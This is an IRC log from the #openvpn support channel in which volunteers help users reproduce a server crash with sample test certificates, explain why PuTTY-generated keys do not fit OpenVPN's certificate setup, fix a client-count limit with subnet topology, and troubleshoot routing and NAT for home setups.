13:11 <@dazo> There are some example certs in the source tree you can use for such testing 13:11 < Wulf> Dennis84: you're missing the point. YOU have to provide complete configuration, including certificates, keys, etc. 13:11 <@dazo> http://openvpn.git.sourceforge.net/git/gitweb.cgi?p=openvpn/openvpn-testing.git;a=tree;f=sample/sample-keys;h=67d4abf9a9a50c5969bc6b712a5aa1911b743566;hb=master 13:11 <@vpnHelper> Title: SourceForge - openvpn/openvpn-testing.git/tree - sample/sample-keys/ (at openvpn.git.sourceforge.net) 13:12 < Wulf> so I basically have to change the "remote" setting in the client configs 13:13 < Dennis84> Wulf: sorry, i thought you would like to test with active users 13:13 < Dennis84> and only change the config 13:13 < Wulf> Dennis84: nope, I would set up a test environment for this 13:14 < Dennis84> Wulf: ok give me 5 minutes 13:16 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:16 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:22 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 13:22 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:23 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:28 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 13:29 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:31 < Dennis84> Wulf: uploaded again 13:31 < Dennis84> hope this works now 13:31 -!- MeanderingCode_ is now known as MeanderingCode 13:33 < Wulf> Dennis84: at least looks better 13:34 < Wulf> Dennis84: 32 or 64 bit? 13:34 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 13:35 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:35 < Dennis84> Wulf: 64bit 13:37 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 13:37 -!- dazo is now known as dazo_afk 13:40 < Wulf> Dennis84: it's the server that crashes? 
13:41 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:41 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:45 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 13:46 -!- Porkepix [~Porkepix@157.138.76.100] has joined #openvpn 13:46 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 13:48 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:53 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 13:54 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:59 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 14:00 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 14:05 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 14:06 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:06 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 14:09 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has joined #openvpn 14:09 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 14:10 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 260 seconds] 14:10 -!- DucsSlack [~desade@24-117-207-111.cpe.cableone.net] has joined #openvpn 14:10 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 14:11 < Wulf> Dennis84: there's an encrypted private key ;) 14:12 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 14:12 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:15 < pekster> Wulf: If it's from the openvpn-testing git project, the readme says the password is merely "password" and it looks like only the 'pass.key' is protected 14:15 < pekster> All the others (ca, server, & client) all are unencrypted 14:15 < Wulf> ah, thanks :) 14:18 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 14:19 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:21 -!- smerz 
[~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 14:21 < Dennis84> Wulf: yes, this server crashes 14:21 < Dennis84> but maybe you need more clients 14:22 < Dennis84> if the server does not crash, I generate you more clients 14:22 < Wulf> Dennis84: I have trouble running your config 14:22 < Dennis84> Wulf: why? 14:22 < Wulf> bad CN in the client certs I guess 14:23 < Dennis84> hmm is it not possible to rename them? 14:24 < Wulf> Thu Mar 7 20:24:22 2013 VERIFY X509NAME ERROR: /C=KG/ST=NA/O=OpenVPN-TEST/CN=Test-Server/emailAddress=me@myhost.mydomain, must be server 14:25 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 14:25 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:26 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host] 14:26 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn 14:31 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 14:31 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:37 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 14:38 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:39 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 14:39 -!- mode/#openvpn [+v s7r] by ChanServ 14:41 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 14:42 -!- DucsSlack is now known as ducblangis 14:43 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 14:44 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:49 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 14:50 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:55 -!- cafaroo [gustaf@c213-89-175-69.bredband.comhem.se] has joined #openvpn 14:56 < Wulf> Dennis84: Segmentation fault 14:56 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 14:56 -!- catsup [~d@64.111.123.163] has joined #openvpn 14:56 < cafaroo> Hi! First time using openVPN and I generated keys with puttyGEN, how can I convert them to use with openVPN?
14:57 < Wulf> cafaroo: how is putty related to openvpn? 14:57 < Wulf> cafaroo: putty is an ssh client, that's a completely different key format 14:58 < cafaroo> I don't know, my network tech told me to create keys and that was the only way I knew how.. Now he says he created so many keys for me in the server that I'm on my own :S 14:58 < cafaroo> I know but there must be some way to convert right? 14:58 < pekster> Well, technically you can generate a CSR from a private RSA key pair that putty's tools can generate, but you can't do it with putty alone. You need to use openssl (or another high-level tool) anyway 14:59 < pekster> What you really want is a tool like Easy-RSA or XCA to generate a keypair and signing request (CSR or sometimes called a ".req" after a common file extension used by this format) 14:59 < cafaroo> Just my luck... I have ssh access to the server now through putty, can I add keys by myself? 14:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 14:59 < cafaroo> Sorry if I'm asking dumb questions but I haven't really used keys at all before.. 14:59 < pekster> cafaroo: ssh access to what, your OpenVPN server? 15:00 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 15:00 < cafaroo> Yes 15:00 < pekster> You should follow the official OpenVPN howto then as it has an entire section describing the PKI setup, including key generation 15:00 < pekster> !howto 15:00 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 15:01 < cafaroo> I tried that but the whole company is on the server so I really don't want to make a trial and error run as I usually do. Specially since I've been working there for about 3 days :P 15:01 < cafaroo> Anyway I'll go back to google!
Thanks for the help m8 :) 15:01 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 15:02 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:03 < Dennis84> Wulf: ok :) 15:03 < Wulf> Dennis84: it's easy to reproduce by letting client1 connect, and kill/start client2 until it crashes 15:03 < pekster> The "short" answer is that no, puttyGen cannot generate a proper PKI for you. All it does is generate an RSA keypair, which is only one "step" in the process of generating a certificate 15:04 <@EugeneKay> If you want a GUI PKI management, XCA is the tool. 15:04 < pekster> Use one of the tools I mentioned above, unless you have an advanced understanding of X509 and PKI and wish to manage the interaction between the keypair, CSR, and signing steps by yourself 15:04 < Wulf> Dennis84: valgrind returns nothing useful, so it's likely not a buffer overflow but a logic error 15:05 < cafaroo> But m8 15:06 < Dennis84> Wulf: ok 15:06 < Dennis84> I go to bed now 15:06 < Dennis84> maybe we can talk tomorrow 15:06 < cafaroo> pekster: I have certificates that he created for me already. ca.crt and myname.crt 15:06 < Dennis84> thanks for your help! 15:06 < Dennis84> good night 15:07 < cafaroo> pekster: I'm just trying to put in a new .key file. But I don't know if it's possible. 15:07 < pekster> cafaroo: The certificate (.crt file) is tied to your private key. It is a *keypair* and the pair comes from the initial generation process. You cannot use a different private key with an issued certificate 15:07 < pekster> A certificate is just the public key with some extra data added by the CA to sign and verify that the CA has "approved" the request 15:08 < cafaroo> Hmm okay! So the only thing to do is to erase this key. Create a new one with easy-rsa then. 15:08 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 15:08 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 15:08 < pekster> How did you get the myname.crt file?
During the generation process of the keypair, you would have ended up with a matching private key 15:08 < pekster> The vpn client needs both components, plus the ca.crt file 15:09 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:09 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 15:09 < cafaroo> I don't know, I sent him my putty key and he sent me back a zip file containing 4 files. The crt files and some config files and the .key file. 15:10 < pekster> You shouldn't have sent your private key out, although if you did hopefully it was at least encrypted 15:10 < pekster> If it's been signed by the CA you're using, just use that private key, signed cert, and the ca.crt files and you're done 15:11 < pekster> I don't know how your signing process works internally, so I can't say if this was done properly or not 15:12 < cafaroo> I know but he took the access away from the servers since I told him to create new keys so I can't access them but that one works logging in to the vpn.. 15:13 < cafaroo> Sorry I can't even understand what I wrote there myself. Those keys work but I can't access our internal servers with those since I told him to create new ones. So with the new ones I can access the servers if I can only convert them, which seems impossible. 15:14 < cafaroo> So I'll contact him tomorrow and treat him with a cookie or something to change it back to the initial configuration. 15:14 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 15:14 < pekster> Yea, you'd best do that. I have no clue what you're trying to "convert" 15:15 < cafaroo> My friend, from what I've written I hope you understand that I really don't know that either.
:P 15:15 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:15 < pekster> putty's ".ppk" files are not OpenSSH compatible, but the puttyGen program does let you convert them 15:16 < pekster> It's still all meaningless unless you somehow integrate that into a CSR and signing process 15:16 < cafaroo> But there is a button in puttygen that says convert to openssh? 15:16 < pekster> In the 'Conversions' menu, yes 15:16 < cafaroo> But it doesn't work? 15:16 < pekster> It works fine. You load a .ppk file and then export the openssh formatted keypair 15:17 < pekster> Or just use a proper tool to generate a keypair for openvpn that does the generation and CSR creation for you 15:17 < pekster> (that's better, because you're not likely to get help here turning your keypair into a CSR. That's an "experts only" thing as far as #openvpn cares) 15:18 * pekster needs to do a writeup on this sometime 15:18 < cafaroo> pekster: ahh well I've already put enough time in this, better call him tomorrow.... 15:19 < cafaroo> Thanks again.
15:21 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 15:21 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:22 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 15:22 -!- levifig [~levifig@spwn.co] has joined #openvpn 15:27 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 15:27 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:32 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 15:33 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:33 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 15:38 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 15:39 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:44 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 15:44 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 250 seconds] 15:45 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:46 -!- jgeboski- [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 15:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:48 -!- kli0rf [kli0rf@unaffiliated/kli0rf] has joined #openvpn 15:50 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 250 seconds] 15:51 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has quit [Ping timeout: 245 seconds] 15:51 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:53 < kli0rf> evening 15:54 < kli0rf> got a little problem, I've got set up an openvpn server, and it works, but only allows one client to be connected 15:54 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 15:54 < kli0rf> when the second client is connecting, the error says there are no free ips left for the second client 15:54 < kli0rf> here are the configs: http://www.codepaste.eu/?hash=57937e7e11d13fea0b1c31eacc0cb3d5 15:55 < kli0rf> anyone has a clue..?
15:56 < pekster> kli0rf: You probably want the 'topology subnet' with a network range that small 15:56 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 256 seconds] 15:56 < pekster> !/30 15:56 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 15:57 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 15:57 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 15:57 < kli0rf> hmmm 15:57 < pekster> Optionally use a larger subnet instead of a /29; you're using rfc1918 space anyway in that example, so it's not like you need to conserve public IPv4 IPs or something 15:58 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:58 < pekster> In net30, a /29 gives you just 1 /30 for the server and another for a single client. In subnet mode, you'll get up to 5 clients plus the server 15:59 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 15:59 < pekster> PtP mode could increase utilization by allowing you to use say .0 for the server and .1 through .7 for clients since there's no notion of a "network" or "broadcast" address in a true PtP interface. Note that this is incompatible with Windows clients 16:00 < pekster> Pick some combination of the above to fix your issue 16:01 < kli0rf> pekster: so increasing the dhcp range, e.g. /28, would do the thing in this case? 16:01 < pekster> The "quick" fix is to just use topology subnet 16:01 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn 16:01 < pekster> Do you need >5 clients?
16:01 < kli0rf> pekster: nope, I need just five :) 16:02 -!- JSharpe [~JSharpe@46.165.221.13] has quit [Quit: Leaving] 16:02 < pekster> Then your current setup works fine if you use topology subnet. Connecting more clients would require a larger subnet (or PtP trickery, but it looks like your client config is Windows, so that's not valid there) 16:03 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 16:03 < kli0rf> I see... 16:03 < pekster> You'll be unable to add more clients beyond 5 even using subnet topology unless you allocate more than a /29. Any reason you're using such a small network in private address space? 16:03 < pekster> 192.168/16 is a bit place... 16:03 < pekster> big* 16:04 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:04 < rob0> I can sell you a chunk of 10/8, or 172.16/12! 16:05 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 16:05 < kli0rf> pekster: no particular reason, just for the sake of clarity. I only need five clients, so it looked like a good idea to use a subnet which can only have five clients...
16:06 -!- flashuni [~textual@108-241-244-170.lightspeed.frokca.sbcglobal.net] has joined #openvpn
16:07 < pekster> Sure, then subnet is the way to go
16:07 < pekster> It's just an odd design decision when you're talking about the (nearly) limitless addressing you have in rfc1918
16:07 < pekster> If that ever changes and you need a 6th client, you need to re-do the network topology and expand it
16:08 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:09 < pekster> rob0: How about I trade you some fd00::/8 space for that :D
16:09 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds]
16:09 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
16:09 -!- mode/#openvpn [+o krzee] by ChanServ
16:10 < kli0rf> pekster: hmmm, my real network is 192.168.1.0/28, and this 192.168.2.0/29 is only for openvpn clients
16:10 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:10 < pekster> Right. Why not assign 192.168.2.0/24 for VPN clients?
16:11 < pekster> It's just a silly design practice to cripple your networks with painfully small netmasks that get expanded if/when utilization increases
16:12 < kli0rf> pekster: i see. ok, let me assign 192.168.2.0/24. do i still need 'topology subnet' in server config?
16:13 < pekster> You wouldn't need it since you can fit 64 unique /30's inside a /24, but I'd still recommend it unless you actually need to support OpenVPN clients older than version 2.1. Those clients are over 6 years old now
16:14 < kli0rf> i see
16:15 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds]
16:16 < pekster> Here's an example of how a net30 split looks with a /29 and a /24, generated with the 'sipcalc' tool (it'll eat both CIDR and netmasks) http://paste.kde.org/689924/
16:16 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:17 < pekster> The "--show-subnets" flag to openVPN generates much the same output. 'topology subnet' does the sane thing and simply assigns each client a single IP and the netmask of the network
16:19 < pekster> --show-valid-subnets I guess
16:19 < pekster> (shows how often I use that feature :)
16:20 < kli0rf> :)
16:21 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds]
16:22 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:22 < pekster> I've only once in recent years needed to support a client as old as 2.0.9, and that was a fully Linux/Unix setup where we just used PtP on our public IPv4 assignments for up to 100% utilization on IP space
16:23 < pekster> Unless you're doing something really exotic, 'topology subnet' is the *strongly* recommended choice
16:24 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
16:27 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds]
16:28 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:29 < kli0rf> hmmmm
16:30 < kli0rf> i can't access samba share using its ip address with topology subnet :/
16:32 -!- jgeboski- is now known as jgeboski
16:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:33 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds]
16:34 < pekster> If you can ping the peer you're trying to reach, it's not an openvpn issue. DNS likely. If you can't ping, it's usually a firewall issue
16:34 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:34 < kli0rf> i can't ping
16:36 < kli0rf> i've left subnet 192.168.2.0/29 and just added 'topology subnet' to server config, so my client connects, reports that it got 192.168.2.2 ip, but i can't ping to 192.168.1.0/28 hosts...
16:37 < rob0> !serverlan
16:37 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
16:40 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Remote host closed the connection]
16:40 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Quit: Yippee-kay-yay]
16:40 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer]
16:40 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:40 -!- ducblangis [~desade@24-117-207-111.cpe.cableone.net] has left #openvpn ["WeeChat 0.3.8"]
16:41 -!- Porkepix [~Porkepix@157.138.76.100] has quit [Quit: Computer has gone to sleep.]
16:42 < kli0rf> i have ip forwarding enabled
16:42 < rob0> Use the flowchart, Luke.
16:42 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
16:46 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds]
16:46 < eHAPPY> !route_outside_openvpn
16:46 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
16:47 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:47 < eHAPPY> wow this channel has more/better info than the openvpn docs itself lol
16:49 < eHAPPY> can someone link me to an install walkthrough? im having a really hard time setting this up to connect from outside my lan
16:49 <@krzee> actually thats also on community.openvpn.net
16:49 <@krzee> eHAPPY,
16:49 <@krzee> !goal
16:49 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
16:50 < eHAPPY> i was to setup a basic vpn, clients connect to it and routes data over and through my local internet
16:50 <@krzee> you want to redirect the client's internet to come from the server?
16:50 < eHAPPY> right, a very basic vpn
16:51 <@krzee> thats not as basic as you think
16:51 <@krzee> !redirect
16:51 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
16:51 <@vpnHelper> http://ircpimps.org/redirect.png
16:51 < eHAPPY> maybe im not wording it properly then
16:51 <@krzee> well it is, but it requires stuff outside openvpn
16:51 <@krzee> namely, enabling ip forwarding and NATing your vpn subnet
16:51 < eHAPPY> i want the most basic VPN setup, client connect to it and can use the servers internet
16:51 <@krzee> all a vpn does is connect 2 machines
16:51 < eHAPPY> yeah
16:52 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds]
16:52 <@krzee> the most basic vpn is simply a ptp between 2 machines
16:52 <@krzee> you want that, and to route all internet over it
16:52 < eHAPPY> oh alright, i figured that was a given
16:52 <@krzee> which is easy, you just do this
16:52 <@krzee> !redirect
16:52 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
16:52 <@vpnHelper> http://ircpimps.org/redirect.png
16:52 <@krzee> what OS is your server?
16:53 < eHAPPY> im trying to run it as the vmware appliance
16:53 -!- catsup [~d@64.111.123.163] has joined #openvpn
16:53 < eHAPPY> but really i dont care as long as it finally works
16:53 <@krzee> that was not an answer
16:53 <@krzee> what OS
16:53 < eHAPPY> umm i think its debian
16:53 <@krzee> ok
16:53 <@krzee> linux
16:53 <@krzee> :-p
16:53 < eHAPPY> yeah
16:53 <@krzee> want a program that will hold your hand and tell you what to do by asking you questions?
16:53 < eHAPPY> im thinking vmware adds another level of complication though
16:54 < eHAPPY> yeah that would be great
16:54 <@krzee> !confgen
16:54 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash
16:54 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has left #openvpn []
16:55 < eHAPPY> ok this will do all the NAT/redirect/etc for me?
16:58 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds]
16:59 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:00 -!- kli0rf [kli0rf@unaffiliated/kli0rf] has left #openvpn []
17:04 -!- dxtr [cfc05a40@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds]
17:04 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 272 seconds]
17:04 < Azrael_-> krzee: hi, perhaps you remember me from some days ago with the smb-problem in windows. i didn't change anything and it works now again. no idea why
17:05 <@krzee> eHAPPY, no, it will tell you what to do
17:05 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:05 <@krzee> it does not assume you're running it on the server machine, and it should not be run as root anyways
17:06 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
17:09 -!- cafaroo [gustaf@c213-89-175-69.bredband.comhem.se] has quit [Ping timeout: 264 seconds]
17:10 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds]
17:11 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:14 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 240 seconds]
17:14 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn
17:17 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 248 seconds]
17:17 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:18 < eHAPPY> ok is there any easier to setup vpn software? this is killer for a simple lab setup lol
17:19 <@EugeneKay> It's plenty easy if you understand basic networking and PKI
17:19 < eHAPPY> i do but many of these questions dont even apply
17:20 < eHAPPY> im just wanting a self contained vpn appliance
17:20 < eHAPPY> dont need to branch out into my entire network
17:21 < pekster> The script you're using is not part of OpenVPN proper, but a 3rd party script authored by the individual who handed it to you. When you use a "kitchen sink" type helper tool, it's presumably going to ask you any question that applies to a feature it supports
17:21 < pekster> Either use the helper-script as it was intended, or write your own config based on your needs
17:21 < eHAPPY> should i just put in garbage info for those parts?
17:23 < rob0> "self contained vpn appliance"? what would that do? It makes no sense.
17:23 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds]
17:23 < eHAPPY> rob0 the openVPN appliance i would imagine
17:23 < eHAPPY> it runs great, just cant get a public IP working
17:23 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:24 < pekster> "can't get a public IP working" ?? That doesn't describe a problem that I understand
17:25 < eHAPPY> ok, my internal ip works just fine, i can route all the traffic i want to and through it
17:26 < eHAPPY> once i try and set it to public, set port forwarding, etc it doesnt work
17:26 < eHAPPY> the openvpn logs never get hit
17:26 < pekster> Then you have messed up your external routing or a firewall along the way
17:26 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn
17:26 < eHAPPY> its all defaulted each time i try and set up
17:27 < pekster> Fix your firewalls and trace the packets using the standard tools for such problems, namely tcpdump and iptables on a Linux system
17:27 < eHAPPY> what all besides the openvpn software do i need to do?
17:27 < pekster> You need to do exactly what I just stated
17:27 < rob0> learn a lot more, I think :)
17:27 < eHAPPY> rob0 i would be fine if there was more documentation :/
17:28 < rob0> !101
17:28 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc
17:28 < eHAPPY> so where should i go to get help on my networking for openvpn?
17:28 < eHAPPY> is there a networking-openvpn channel?
17:28 < rob0> !tcpip
17:28 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
17:28 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds]
17:29 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:33 < eHAPPY> im not seeing anything on proprietary vpns...what should i be looking for?
17:34 < pekster> 1) OpenVPN is not proprietary as it is released under the GPLv2. 2) your issue isn't even related to OpenVPN. Apparently your routing and/or firewall is misconfigured and as a result your VPN server never sees the packets the client sends
17:34 -!- dxtr [4574b2ad@unaffiliated/dxtr] has joined #openvpn
17:34 < pekster> It sounds like you need to learn some basic networking skills in order to diagnose and fix why that isn't working
17:35 < eHAPPY> pekster while that would be 3-5 hours well spent im just looking for a walkthrough guide
17:35 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer]
17:35 < eHAPPY> ie "once openvpn is running, configure your router to software port xx,xx and enable NAT"
17:35 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:35 < eHAPPY> forward*
17:36 < pekster> !basic
17:36 <@vpnHelper> "basic" is if you do not understand basic networking, you probably should not be administrating a vpn... you should understand the basics of routing / firewalls first
17:37 -!- flashuni [~textual@108-241-244-170.lightspeed.frokca.sbcglobal.net] has quit [Quit: Computer has gone to sleep.]
17:38 < eHAPPY> like i said, its a home lab
17:39 < eHAPPY> ill just go with an l2tp/ipsec setup instead; worth spending 50$ not to deal with all this i guess
17:39 < pekster> That doesn't change the fact that you're struggling with a fairly basic networking concept that is outside the scope of using openvpn. It sounds like you've misconfigured your home router or your firewall on the OS/host
17:39 < eHAPPY> ...its defaulted like i said
17:40 < pekster> I don't have any clue what "defaulted" means. I don't know your home router, nor do I care to attempt to support it
17:40 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds]
17:41 < pekster> OpenVPN is one of the easiest VPNs out there to configure through firewalls and NAT since it multiplexes all the communication over a single UDP (or TCP) port
17:41 < eHAPPY> default means all stock settings, nothing changed
17:41 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:44 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has quit [Ping timeout: 250 seconds]
17:47 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds]
17:48 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:53 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 250 seconds]
